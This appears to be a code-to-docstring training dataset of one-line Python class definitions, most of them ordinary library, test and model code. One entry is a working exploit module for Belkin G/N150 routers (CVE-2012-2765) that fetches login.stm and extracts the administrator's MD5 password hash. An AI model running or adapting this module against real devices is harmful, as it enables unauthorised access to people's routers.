class STS(RegressionTask): <NEW_LINE> <INDENT> def __init__(self, config: configure_finetuning.FinetuningConfig, tokenizer): <NEW_LINE> <INDENT> super(STS, self).__init__(config, "sts", tokenizer, 0.0, 5.0) <NEW_LINE> <DEDENT> def _create_examples(self, lines, split): <NEW_LINE> <INDENT> examples = [] <NEW_LINE> if split == "test": <NEW_LINE> <INDENT> examples += self._load_glue(lines, split, -2, -1, None, True) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> examples += self._load_glue(lines, split, -3, -2, -1, True) <NEW_LINE> <DEDENT> if self.config.double_unordered and split == "train": <NEW_LINE> <INDENT> examples += self._load_glue( lines, split, -3, -2, -1, True, len(examples), True) <NEW_LINE> <DEDENT> return examples | Semantic Textual Similarity. | 62598facdd821e528d6d8edd |
class WAR_Card(cards.Card): <NEW_LINE> <INDENT> ACE_VALUE = 1 <NEW_LINE> @property <NEW_LINE> def value(self): <NEW_LINE> <INDENT> if self.is_face_up: <NEW_LINE> <INDENT> v = WAR_Card.RANKS.index(self.rank) + 1 <NEW_LINE> if v > 10: <NEW_LINE> <INDENT> v = 10 <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> v = None <NEW_LINE> <DEDENT> return v | Карта для игры в Блек-джек. | 62598fac4e4d5625663723ce |
class Tracking(lyrebird.PluginView): <NEW_LINE> <INDENT> def index(self): <NEW_LINE> <INDENT> return self.render_template('index.html') <NEW_LINE> <DEDENT> def get_result(self): <NEW_LINE> <INDENT> return jsonify({'result': app_context.result_list}) <NEW_LINE> <DEDENT> def get_content(self, id=''): <NEW_LINE> <INDENT> for item in app_context.content: <NEW_LINE> <INDENT> if item['id'] == id: <NEW_LINE> <INDENT> return jsonify(item) <NEW_LINE> <DEDENT> <DEDENT> return abort(400, 'Request not found') <NEW_LINE> <DEDENT> def save_report(self): <NEW_LINE> <INDENT> report_data_path = os.path.join(os.path.dirname(__file__), 'report_template/data/report-data.js') <NEW_LINE> with codecs.open(report_data_path, 'w+', 'utf-8') as f: <NEW_LINE> <INDENT> f.write('var reportCaseData='+json.dumps({'result': app_context.result_list}, ensure_ascii = False)) <NEW_LINE> f.write('\n') <NEW_LINE> f.write('var baseData='+json.dumps(app_context.config, ensure_ascii = False)) <NEW_LINE> f.write('\n') <NEW_LINE> f.write('var detailCollection='+json.dumps(app_context.content, ensure_ascii = False)) <NEW_LINE> f.write('\n') <NEW_LINE> <DEDENT> report_path = os.path.join(os.path.dirname(__file__), 'report_template') <NEW_LINE> target_path = os.path.abspath(os.path.join(lyrebird.get_plugin_storage(), 'report')) <NEW_LINE> if os.path.exists(target_path): <NEW_LINE> <INDENT> shutil.rmtree(target_path) <NEW_LINE> <DEDENT> shutil.copytree(report_path, target_path) <NEW_LINE> return context.make_ok_response() <NEW_LINE> <DEDENT> def clear_result(self): <NEW_LINE> <INDENT> app_context.result_list = [] <NEW_LINE> app_context.content = [] <NEW_LINE> tracking_init() <NEW_LINE> context.application.socket_io.emit('update', namespace='/tracking-plugin') <NEW_LINE> return context.make_ok_response() <NEW_LINE> <DEDENT> def get_base_info(self): <NEW_LINE> <INDENT> return jsonify(app_context.config) <NEW_LINE> <DEDENT> def groups(self): <NEW_LINE> <INDENT> return jsonify(app_context.select_groups) <NEW_LINE> <DEDENT> def select(self): <NEW_LINE> <INDENT> grouplist = request.json.get('group') <NEW_LINE> app_context.select_groups = grouplist <NEW_LINE> return context.make_ok_response() <NEW_LINE> <DEDENT> def on_create(self): <NEW_LINE> <INDENT> tracking_init() <NEW_LINE> self.set_template_root('lyrebird_tracking') <NEW_LINE> self.add_url_rule('/', view_func=self.index) <NEW_LINE> self.add_url_rule('/result', view_func=self.get_result) <NEW_LINE> self.add_url_rule('/content/<string:id>', view_func=self.get_content) <NEW_LINE> self.add_url_rule('/report', view_func=self.save_report) <NEW_LINE> self.add_url_rule('/clear', view_func=self.clear_result) <NEW_LINE> self.add_url_rule('/base', view_func=self.get_base_info) <NEW_LINE> self.add_url_rule('/group', view_func=self.groups) <NEW_LINE> self.add_url_rule('/select', view_func=self.select, methods=['POST']) <NEW_LINE> <DEDENT> def get_icon(self): <NEW_LINE> <INDENT> return 'fa fa-fw fa-line-chart' <NEW_LINE> <DEDENT> def default_conf(self): <NEW_LINE> <INDENT> conf_path = os.path.dirname(__file__) + '/conf.json' <NEW_LINE> with codecs.open(conf_path, 'r', 'utf-8') as f: <NEW_LINE> <INDENT> return json.load(f) | tracking插件视图 | 62598fac5166f23b2e243381 |
class LockedDropout(nn.Module): <NEW_LINE> <INDENT> def __init__(self, drop): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.drop = nn.Dropout(drop) <NEW_LINE> <DEDENT> def forward(self, x): <NEW_LINE> <INDENT> mask = self.drop(torch.ones(1, x.size(1), x.size(2)).cuda()) <NEW_LINE> return mask * x | Locked dropout layer. Input is 3D tensor, dropout along dimension 0 is constant at every forward call. | 62598fac01c39578d7f12d27 |
class FBNamespaceAction (object): <NEW_LINE> <INDENT> kFBConcatNamespace=property(doc="Use to add a namespace name to object. ") <NEW_LINE> kFBReplaceNamespace=property(doc="Use to replace a define namespace. ") <NEW_LINE> kFBRemoveAllNamespace=property(doc="Remove all the namespace name. ") <NEW_LINE> pass | Namespace flags.
| 62598fac23849d37ff85105d |
@override_settings(ALLOWED_HOSTS=['rdap.example']) <NEW_LINE> class TestNameserverToDict(SimpleTestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> self.request = RequestFactory(HTTP_HOST='rdap.example').get('/dummy/') <NEW_LINE> <DEDENT> def test_simple(self): <NEW_LINE> <INDENT> nameserver = NameServer(fqdn='nameserver.example.cz', ip_addresses=[]) <NEW_LINE> result = nameserver_to_dict(self.request, nameserver) <NEW_LINE> self.assertEqual(result['links'][0]['value'], 'http://rdap.example/nameserver/nameserver.example.cz') | Test `rdap.rdap_rest.domain.nameserver_to_dict` function. | 62598facfff4ab517ebcd78e |
class ConversationMessageFactory(DjangoModelFactory): <NEW_LINE> <INDENT> class Meta: <NEW_LINE> <INDENT> model = ConversationMessageModel <NEW_LINE> strategy = CREATE_STRATEGY <NEW_LINE> <DEDENT> body = Faker('text') <NEW_LINE> sent_at = now() | Factory for message creation | 62598facbaa26c4b54d4f25b |
class Tv(Video): <NEW_LINE> <INDENT> def __init__(self,title,box_art,poster_image_url,trailer_youtube_url,broadcaster): <NEW_LINE> <INDENT> Video.__init__(self,title,box_art,poster_image_url,trailer_youtube_url) <NEW_LINE> self.broadcaster = broadcaster <NEW_LINE> <DEDENT> def show_trailer(self): <NEW_LINE> <INDENT> webbrowser.open(self.trailer_youtube_url) | Child Class Object that is inherited from Parent Class Object | 62598fac851cf427c66b8265 |
class ForkChildVortex(object): <NEW_LINE> <INDENT> def __init__(self, vortexClientProtocol): <NEW_LINE> <INDENT> assert isinstance(vortexClientProtocol, VortexPayloadProtocol) <NEW_LINE> self._vortexClientProtocol = vortexClientProtocol <NEW_LINE> <DEDENT> def uuid(self): <NEW_LINE> <INDENT> return self._vortexClientProtocol.serverVortexUuid <NEW_LINE> <DEDENT> def isShutdown(self): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def shutdown(self): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def vortexUuids(self): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def isVortexAlive(self, vortexUuid): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def vortexClientIpPort(self, vortexUuid): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def _beat(self): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def connectionOpened(self, session, vortexConnection): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def connectionClosed(self, conn): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def _sessionExpired(self, sessionUuid): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def payloadReveived(self, session, conn, payload): <NEW_LINE> <INDENT> raise NotImplementedError <NEW_LINE> <DEDENT> def send(self, payload, vortexUuid=None): <NEW_LINE> <INDENT> self.sendVortexMsg(vortexMsg=payload.toVortexMsg(compressionLevel=0), vortexUuid=vortexUuid) <NEW_LINE> <DEDENT> def sendVortexMsg(self, vortexMsg, vortexUuid=None): <NEW_LINE> <INDENT> ModData.standardIo.write(vortexMsg) <NEW_LINE> ModData.standardIo.write('.') | VortexServer
The static instance of the controller | 62598fac91f36d47f2230e7a |
class TestNormalizedAction(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def testNormalizedAction(self): <NEW_LINE> <INDENT> model = artikcloud.models.normalized_action.NormalizedAction() | NormalizedAction unit test stubs | 62598fac1f037a2d8b9e4097 |
class MdiChild(pmonitor.Monitor): <NEW_LINE> <INDENT> def __init__(self, fio, cmds, info, title='X', mmax=100): <NEW_LINE> <INDENT> super(MdiChild, self).__init__(fio, cmds, info, title, mmax) | Create instance of pmonitor.Monitor | 62598fac0c0af96317c5632b |
class MagnitudeSigmaIMTTrellis(MagnitudeIMTTrellis): <NEW_LINE> <INDENT> def _build_plot(self, ax, i_m, gmvs): <NEW_LINE> <INDENT> self.labels = [] <NEW_LINE> self.lines = [] <NEW_LINE> for gmpe in self.gsims: <NEW_LINE> <INDENT> self.labels.append(gmpe.__class__.__name__) <NEW_LINE> line, = ax.plot(self.magnitudes, gmvs[gmpe.__class__.__name__][i_m][:, 0], '-', linewidth=2.0, label=gmpe.__class__.__name__) <NEW_LINE> self.lines.append(line) <NEW_LINE> ax.grid(True) <NEW_LINE> ax.set_xlim(floor(self.magnitudes[0]), ceil(self.magnitudes[-1])) <NEW_LINE> self._set_labels(i_m, ax) <NEW_LINE> <DEDENT> <DEDENT> def get_ground_motion_values(self): <NEW_LINE> <INDENT> gmvs = OrderedDict() <NEW_LINE> for gmpe in self.gsims: <NEW_LINE> <INDENT> gmvs.update([(gmpe.__class__.__name__, {})]) <NEW_LINE> for i_m in self.imts: <NEW_LINE> <INDENT> gmvs[gmpe.__class__.__name__][i_m] = np.zeros([len(self.rctx), self.nsites], dtype=float) <NEW_LINE> for iloc, rct in enumerate(self.rctx): <NEW_LINE> <INDENT> _, sigmas = gmpe.get_mean_and_stddevs( self.sctx, rct, self.dctx, imt.from_string(i_m), [self.stddevs]) <NEW_LINE> gmvs[gmpe.__class__.__name__][i_m][iloc, :] = sigmas[0] <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> return gmvs <NEW_LINE> <DEDENT> def _set_labels(self, i_m, ax): <NEW_LINE> <INDENT> ax.set_xlabel("Magnitude", fontsize=16) <NEW_LINE> ax.set_ylabel(self.stddevs + " Std. Dev.", fontsize=16) | Creates the Trellis plot for the standard deviations | 62598fac55399d3f056264cd |
class LoginHelper(object): <NEW_LINE> <INDENT> def do_login(self, data): <NEW_LINE> <INDENT> return self.client.post( f"{reverse('login')}?next=/openid/authorize/" f"%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id" f"%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2F" f"example.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO", data=data, follow=True ) | Test urls can be handled a bit better, however this was the fastest way
to refactor the existing tests. | 62598fac1b99ca400228f504 |
class prop_writer (object): <NEW_LINE> <INDENT> def __init__ (self, filepath, transform, scene): <NEW_LINE> <INDENT> self.lib = dsf.path_util.daz_library (filepath = filepath) <NEW_LINE> self.scene = scene <NEW_LINE> self.duf_libpath = self.lib.get_libpath (filepath) <NEW_LINE> self.transform = transform <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def get_selected_objects (self, scene): <NEW_LINE> <INDENT> objects = [obj for obj in scene.objects if obj.select] <NEW_LINE> return objects <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def get_selected_objects_by_data (self, scene): <NEW_LINE> <INDENT> all_objs = self.get_selected_objects (scene) <NEW_LINE> groups = dsf.geom_create.group_objects_by_mesh (all_objs) <NEW_LINE> objs = [obj[0] for obj in groups] <NEW_LINE> return objs <NEW_LINE> <DEDENT> def create_data_file (self, ctx): <NEW_LINE> <INDENT> objects = self.get_selected_objects_by_data (ctx.scene) <NEW_LINE> gcreator = dsf.geom_create.geom_creator (ctx.scene, self.transform) <NEW_LINE> geometry_datas = [gcreator.create_geometry_and_uvs (obj) for obj in objects] <NEW_LINE> for gdata in geometry_datas: <NEW_LINE> <INDENT> geo = gdata.geometry <NEW_LINE> uvs = gdata.uvs <NEW_LINE> if uvs: <NEW_LINE> <INDENT> geo['default_uv_set'] = '#' + urp.quote (uvs[0]['id']) <NEW_LINE> <DEDENT> <DEDENT> data = { "asset_info": {}, "geometry_library": [g.geometry for g in geometry_datas], "uv_set_library": sum ([g.uvs for g in geometry_datas], []) } <NEW_LINE> return data <NEW_LINE> <DEDENT> def write_json (self, libpath, data): <NEW_LINE> <INDENT> ofh = self.lib.create_output_stream (libpath) <NEW_LINE> json.dump (data, ofh, indent = 2, sort_keys = True) <NEW_LINE> <DEDENT> def write_geometries (self, objs): <NEW_LINE> <INDENT> geom_writer = dsf.geom_writer.geom_writer (self.lib, self.scene, self.transform) <NEW_LINE> data_dic = geom_writer.write_meshes_for_objects (objs) <NEW_LINE> return data_dic <NEW_LINE> <DEDENT> def write_objects (self, objs, data_dic): <NEW_LINE> <INDENT> scene_writer = dsf.scene_writer.scene_writer (self.transform, data_dic) <NEW_LINE> data = scene_writer.create_scene_file (objs) <NEW_LINE> self.lib.write_local_file (data, self.duf_libpath) <NEW_LINE> <DEDENT> def write_scene (self, ctx): <NEW_LINE> <INDENT> scene = ctx.scene <NEW_LINE> objs = self.get_selected_objects (self.scene) <NEW_LINE> data_dic = self.write_geometries (objs) <NEW_LINE> self.write_objects (objs, data_dic) | write props for a single export-operation.
| 62598fac7d847024c075c36d |
class DSfloat(float): <NEW_LINE> <INDENT> __slots__ = 'original_string' <NEW_LINE> def __init__(self, val): <NEW_LINE> <INDENT> if isinstance(val, (str, compat.text_type)): <NEW_LINE> <INDENT> self.original_string = val <NEW_LINE> <DEDENT> elif isinstance(val, (DSfloat, DSdecimal)) and hasattr(val, 'original_string'): <NEW_LINE> <INDENT> self.original_string = val.original_string <NEW_LINE> <DEDENT> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> if hasattr(self, 'original_string'): <NEW_LINE> <INDENT> return self.original_string <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return super(DSfloat, self).__str__() <NEW_LINE> <DEDENT> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "'" + str(self) + "'" | Store values for DICOM VR of DS (Decimal String) as a float.
If constructed from an empty string, return the empty string,
not an instance of this class. | 62598fac10dbd63aa1c70b5c |
class Model(peewee.Model): <NEW_LINE> <INDENT> uid = peewee.PrimaryKeyField(unique=True, index=True) <NEW_LINE> uts = peewee.DateTimeField(default=datetime.datetime.now, index=True) <NEW_LINE> class Meta: <NEW_LINE> <INDENT> database = db.pool <NEW_LINE> order_by = ('-uts', ) | Common db model:
uid - primary key
uts - timestamp (auto on creation) | 62598fac85dfad0860cbfa48 |
class NetworkNamespace(object): <NEW_LINE> <INDENT> CLONE_NEWNET = 0x40000000 <NEW_LINE> @staticmethod <NEW_LINE> def _error_handler(result, func, arguments): <NEW_LINE> <INDENT> if result == -1: <NEW_LINE> <INDENT> errno = ctypes.get_errno() <NEW_LINE> raise OSError(errno, os.strerror(errno)) <NEW_LINE> <DEDENT> <DEDENT> def __init__(self, netns): <NEW_LINE> <INDENT> self.current_netns = '/proc/{pid}/ns/net'.format(pid=os.getpid()) <NEW_LINE> self.target_netns = '/var/run/netns/{netns}'.format(netns=netns) <NEW_LINE> self.set_netns = ctypes.CDLL('libc.so.6', use_errno=True).setns <NEW_LINE> self.set_netns.errcheck = self._error_handler <NEW_LINE> <DEDENT> def __enter__(self): <NEW_LINE> <INDENT> self.current_netns_fd = open(self.current_netns, encoding='utf-8') <NEW_LINE> with open(self.target_netns, encoding='utf-8') as fd: <NEW_LINE> <INDENT> self.set_netns(fd.fileno(), self.CLONE_NEWNET) <NEW_LINE> <DEDENT> <DEDENT> def __exit__(self, *args): <NEW_LINE> <INDENT> self.set_netns(self.current_netns_fd.fileno(), self.CLONE_NEWNET) <NEW_LINE> self.current_netns_fd.close() | A network namespace context manager.
Runs wrapped code inside the specified network namespace.
:param netns: The network namespace name to enter. | 62598fac63d6d428bbee2754 |
class PyTest(TestCommand): <NEW_LINE> <INDENT> def finalize_options(self): <NEW_LINE> <INDENT> TestCommand.finalize_options(self) <NEW_LINE> self.test_args = ['-s'] <NEW_LINE> self.test_suite = True <NEW_LINE> <DEDENT> def run_tests(self): <NEW_LINE> <INDENT> import pytest <NEW_LINE> errcode = pytest.main(self.test_args) <NEW_LINE> sys.exit(errcode) | pytest's integration with setuptools, which is borrowed from
http://pytest.org/latest/goodpractises.html#goodpractises | 62598facd7e4931a7ef3c03f |
class PotentialKey(DefaultModel): <NEW_LINE> <INDENT> id: str = Field( ..., description="A unique identifier of this potential, i.e. a SMARTS pattern or an atom type", ) <NEW_LINE> mult: Optional[int] = Field( None, description="The index of this duplicate interaction" ) <NEW_LINE> associated_handler: Optional[str] = Field( None, description="The type of handler this potential key is associated with, " "i.e. 'Bonds', 'vdW', or 'LibraryCharges", ) <NEW_LINE> bond_order: Optional[float] = Field( None, description="If this is a key to a WrappedPotential interpolating multiple parameter(s), " "the bond order determining the coefficients of the wrapped potentials.", ) <NEW_LINE> def __hash__(self) -> int: <NEW_LINE> <INDENT> return hash((self.id, self.mult, self.associated_handler, self.bond_order)) | A unique identifier of an instance of physical parameters as applied to a segment of a chemical topology.
These refer to a single term in a force field as applied to a single segment of a chemical
topology, i.e. a single atom or dihedral. For example, a PotentialKey corresponding to a
bond would store the the force constant and the equilibrium bond length as determined by
the force field. These keys to not have direct knowledge of where in a topology they have been
applied.
Examples
--------
Create a PotentialKey corresponding to the parameter with id `b55` in OpenFF "Parsley" 1.0.0
.. code-block:: pycon
>>> from openff.interchange.models import PotentialKey
>>> from openff.toolkit.typing.engines.smirnoff import ForceField
>>> parsley = ForceField("openff-1.0.0.offxml")
>>> param = parsley["Bonds"].get_parameter({"id": "b55"})[0]
>>> bond_55 = PotentialKey(id=param.smirks)
>>> bond_55
PotentialKey(id='[#16X4,#16X3:1]-[#8X2:2]', mult=None, associated_handler=None, bond_order=None)
Create a PotentialKey corresponding to the angle parameters in OPLS-AA defined
between atom types opls_135, opls_135, and opls_140
.. code-block:: pycon
>>> oplsaa_angle = PotentialKey(id="opls_135-opls_135-opls_140")
>>> oplsaa_angle
PotentialKey(id='opls_135-opls_135-opls_140', mult=None, associated_handler=None, bond_order=None) | 62598faca219f33f346c67c0 |
class USPSService(object): <NEW_LINE> <INDENT> SERVICE_NAME = '' <NEW_LINE> CHILD_XML_NAME = '' <NEW_LINE> PARAMETERS = [] <NEW_LINE> @property <NEW_LINE> def API(self): <NEW_LINE> <INDENT> return self.SERVICE_NAME <NEW_LINE> <DEDENT> def __init__(self, url, user_id): <NEW_LINE> <INDENT> self.url = url <NEW_LINE> self.user_id = user_id <NEW_LINE> <DEDENT> def submit_xml(self, xml): <NEW_LINE> <INDENT> data = {'XML':ET.tostring(xml), 'API':self.API} <NEW_LINE> response = urllib.request.urlopen(self.url, bytes(urllib.parse.urlencode(data), "utf-8")) <NEW_LINE> root = ET.parse(response).getroot() <NEW_LINE> if root.tag == 'Error': <NEW_LINE> <INDENT> raise USPSXMLError(root) <NEW_LINE> <DEDENT> error = root.find('.//Error') <NEW_LINE> if error: <NEW_LINE> <INDENT> raise USPSXMLError(error) <NEW_LINE> <DEDENT> return root <NEW_LINE> <DEDENT> def parse_xml(self, xml): <NEW_LINE> <INDENT> items = list() <NEW_LINE> for item in xml.getchildren(): <NEW_LINE> <INDENT> items.append(xmltodict(item)) <NEW_LINE> <DEDENT> return items <NEW_LINE> <DEDENT> def make_xml(self, data, user_id): <NEW_LINE> <INDENT> root = ET.Element(self.SERVICE_NAME+'Request') <NEW_LINE> root.attrib['USERID'] = user_id <NEW_LINE> index = 0 <NEW_LINE> for data_dict in data: <NEW_LINE> <INDENT> data_xml = dicttoxml(data_dict, self.CHILD_XML_NAME, self.PARAMETERS) <NEW_LINE> data_xml.attrib['ID'] = str(index) <NEW_LINE> root.append(data_xml) <NEW_LINE> index += 1 <NEW_LINE> <DEDENT> return root <NEW_LINE> <DEDENT> def execute(self,data, user_id=None): <NEW_LINE> <INDENT> if user_id is None: <NEW_LINE> <INDENT> user_id = self.user_id <NEW_LINE> <DEDENT> xml = self.make_xml(data, user_id) <NEW_LINE> logger.info("USPS XML Request: %s" % ET.tostring(xml)) <NEW_LINE> return self.parse_xml(self.submit_xml(xml)) | Base USPS Service Wrapper implementation | 62598fac6e29344779b00606 |
class ISPClass: <NEW_LINE> <INDENT> yidong = [139, 138, 137, 136, 135, 134, 159, 158, 157, 150, 151, 152, 147, 188, 187, 182, 183, 184, 178] <NEW_LINE> liantong = [130, 131, 132, 156, 155, 186, 185, 145, 176] <NEW_LINE> dianxin = [133, 153, 189, 180, 181, 177, 173] <NEW_LINE> simulate = [100, 199] <NEW_LINE> all = yidong + liantong + dianxin | 号段数据 | 62598fac99cbb53fe6830e81 |
class Exploit(exploits.Exploit): <NEW_LINE> <INDENT> __info__ = { 'name': 'Belkin G & N150 Password Disclosure', 'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format', 'authors': [ 'Aodrulez <f3arm3d3ar[at]gmail.com>', 'Avinash Tangirala', 'Marcin Bury <marcin.bury[at]reverse-shell.com>', ], 'references': [ 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765', 'https://www.exploit-db.com/exploits/17349/', ], 'devices': [ 'Belkin G', 'Belkin N150', ], } <NEW_LINE> target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) <NEW_LINE> port = exploits.Option(80, 'Target Port') <NEW_LINE> def run(self): <NEW_LINE> <INDENT> url = "{}:{}/login.stm".format(self.target, self.port) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> val = re.findall('password\s?=\s?"(.+?)"', response.text) <NEW_LINE> if len(val): <NEW_LINE> <INDENT> print_success("Exploit success") <NEW_LINE> data = [('admin', val[0])] <NEW_LINE> headers = ("Login", "MD5 Password") <NEW_LINE> print_table(headers, *data) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print_error("Exploit failed. Device seems to be not vulnerable.") <NEW_LINE> <DEDENT> <DEDENT> @mute <NEW_LINE> def check(self): <NEW_LINE> <INDENT> url = "{}:{}/login.stm".format(self.target, self.port) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> val = re.findall('password\s?=\s?"(.+?)"', response.text) <NEW_LINE> if len(val): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> return False | Exploit implementation for Belkin G and N150 Password MD5 Disclosure vulnerability.
If the target is vulnerable, password in MD5 format is returned. | 62598fac66673b3332c30375 |
class ConfigurationMixin(object): <NEW_LINE> <INDENT> def _render_config(self, flavor): <NEW_LINE> <INDENT> config = template.SingleInstanceConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> config.render() <NEW_LINE> return config <NEW_LINE> <DEDENT> def _render_replica_source_config(self, flavor): <NEW_LINE> <INDENT> config = template.ReplicaSourceConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> config.render() <NEW_LINE> return config <NEW_LINE> <DEDENT> def _render_replica_config(self, flavor): <NEW_LINE> <INDENT> config = template.ReplicaConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> config.render() <NEW_LINE> return config <NEW_LINE> <DEDENT> def _render_config_dict(self, flavor): <NEW_LINE> <INDENT> config = template.SingleInstanceConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> ret = config.render_dict() <NEW_LINE> LOG.debug("the default template dict of mysqld section: %s", ret) <NEW_LINE> return ret | Configuration Mixin
Configuration related tasks for instances and resizes. | 62598fac1f5feb6acb162bca |
class SpiralMovement(Movement): <NEW_LINE> <INDENT> def position(self, data, robot): <NEW_LINE> <INDENT> x, y, alpha, v, v_alpha = data <NEW_LINE> if v < 20: <NEW_LINE> <INDENT> a = 1 <NEW_LINE> a_alpha = 1 <NEW_LINE> return a, a_alpha <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> a = 1 <NEW_LINE> a_alpha = 0 <NEW_LINE> <DEDENT> return a, a_alpha | Accelerates to a certain speed while turning,
then keeps accelerating while retaining turn speed. | 62598fac4e4d5625663723cf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.